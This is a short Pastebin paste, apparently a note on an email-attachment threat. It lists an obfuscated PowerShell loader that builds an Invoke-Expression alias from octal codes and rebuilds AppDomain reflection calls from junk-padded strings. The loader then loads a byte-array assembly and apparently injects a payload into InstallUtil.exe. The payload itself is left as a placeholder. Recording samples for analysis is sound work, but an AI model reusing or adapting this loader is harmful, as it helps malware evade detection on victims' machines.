Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 18/08/20
- - - - - -
- email atach threat, payload from internet website
- https://pastebin.com/030LpKuP
- $t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal g $t0
- [String]$iTHr=' **** hex code of payload goes there **** '.replace('<%','0')
- [Byte[]]$tZFe=UFeppnCY $HcyqzyXBo
- $y='[System.Ap!%%%%#######@@@@@@@****************ain]'.replace('!%%%%#######@@@@@@@****************','pDom')|g;$g55=$y.GetMethod("get_CurrentDomain")
- $uy='$g55.In!%%%%#######@@@@@@@****************ke($null,$null)'.replace('!%%%%#######@@@@@@@****************','vo')| g
- $vmc2='$uy.Lo!%%%%#######@@@@@@@****************($tZFe)'.Replace('!%%%%#######@@@@@@@****************','ad')
- $vmc2| g
- [Byte[]]$iTHr2= UFeppnCY $iTHr
- [rerup]::qw5f0('InstallUtil.exe',$iTHr2)
Add Comment
Please, Sign In to add comment